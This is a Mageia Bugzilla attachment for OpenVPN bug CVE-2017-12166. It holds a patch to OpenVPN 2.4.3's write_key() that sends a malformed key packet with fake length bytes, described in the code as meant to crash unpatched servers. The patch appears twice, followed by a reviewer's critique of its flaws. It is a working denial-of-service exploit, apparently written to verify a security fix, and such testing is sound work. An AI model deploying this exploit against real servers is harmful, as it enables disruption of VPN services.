Mageia Bugzilla – Attachment 9716 Details for Bug 21780: openvpn new security issue CVE-2017-12166
Patch against openvpn 2.4.3 to exploit CVE-2017-12166
openvpn_exploit_test.patch (text/plain), 1.32 KB, created by Josua Dietze on 2017-10-10 23:01:42 CEST
>--- openvpn-2.4.3/src/openvpn/crypto.c.orig 2017-06-20 13:07:22.000000001 +0200 >+++ openvpn-2.4.3/src/openvpn/crypto.c 2017-10-10 22:49:18.749821813 +0200 >@@ -1634,23 +1634,41 @@ write_key(const struct key *key, const s > ASSERT(kt->cipher_length <= MAX_CIPHER_KEY_LENGTH > && kt->hmac_length <= MAX_HMAC_KEY_LENGTH); > >- if (!buf_write(buf, &kt->cipher_length, 1)) >- { >- return false; >- } >- if (!buf_write(buf, &kt->hmac_length, 1)) >+/* Create fake key packet to crash unpatched server */ >+ >+ uint8_t fake_len = 0x7f; >+ uint8_t fake_data[0xff]; >+ >+ if (!buf_write(buf, &fake_len, 1)) > { > return false; > } >- if (!buf_write(buf, key->cipher, kt->cipher_length)) >+ if (!buf_write(buf, &fake_len, 1)) > { > return false; > } >- if (!buf_write(buf, key->hmac, kt->hmac_length)) >+ if (!buf_write(buf, fake_data, 0xff)) > { > return false; > } > >+// if (!buf_write(buf, &kt->cipher_length, 1)) >+// { >+// return false; >+// } >+// if (!buf_write(buf, &kt->hmac_length, 1)) >+// { >+// return false; >+// } >+// if (!buf_write(buf, key->cipher, kt->cipher_length)) >+// { >+// return false; >+// } >+// if (!buf_write(buf, key->hmac, kt->hmac_length)) >+// { >+// return false; >+// } >+ > return true; > } >
--- openvpn-2.4.3/src/openvpn/crypto.c.orig 2017-06-20 13:07:22.000000001 +0200 +++ openvpn-2.4.3/src/openvpn/crypto.c 2017-10-10 22:49:18.749821813 +0200 @@ -1634,23 +1634,41 @@ write_key(const struct key *key, const s ASSERT(kt->cipher_length <= MAX_CIPHER_KEY_LENGTH && kt->hmac_length <= MAX_HMAC_KEY_LENGTH); - if (!buf_write(buf, &kt->cipher_length, 1)) - { - return false; - } - if (!buf_write(buf, &kt->hmac_length, 1)) +/* Create fake key packet to crash unpatched server */ + + uint8_t fake_len = 0x7f; + uint8_t fake_data[0xff]; + + if (!buf_write(buf, &fake_len, 1)) { return false; } - if (!buf_write(buf, key->cipher, kt->cipher_length)) + if (!buf_write(buf, &fake_len, 1)) { return false; } - if (!buf_write(buf, key->hmac, kt->hmac_length)) + if (!buf_write(buf, fake_data, 0xff)) { return false; } +// if (!buf_write(buf, &kt->cipher_length, 1)) +// { +// return false; +// } +// if (!buf_write(buf, &kt->hmac_length, 1)) +// { +// return false; +// } +// if (!buf_write(buf, key->cipher, kt->cipher_length)) +// { +// return false; +// } +// if (!buf_write(buf, key->hmac, kt->hmac_length)) +// { +// return false; +// } + return true; }
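Review bot: fake_data[0xff] is declared without an initializer and then passed whole to buf_write(buf, fake_data, 0xff), so this test build puts 255 bytes of uninitialized stack memory from the sending process on the wire; zero it first (for example `uint8_t fake_data[0xff] = {0};`) so the test packet is deterministic and carries no process memory. Both length bytes are 0x7f, which announces 254 bytes of key material while 255 are written; if the mismatch is intended, say so in the comment, otherwise size the array from the announced lengths. The ASSERT kept above the change still bounds kt->cipher_length and kt->hmac_length against MAX_CIPHER_KEY_LENGTH and MAX_HMAC_KEY_LENGTH, but those fields are no longer what gets written, so it guards nothing in this path. The real write_key() body is only commented out with //, which means key->cipher and key->hmac are never sent once the patch is applied; wrap the test path in a compile-time guard (an #ifdef with a hypothetical name such as OPENVPN_CVE_2017_12166_TEST) instead of leaving dead code, so a binary built from this tree cannot be mistaken for a working client.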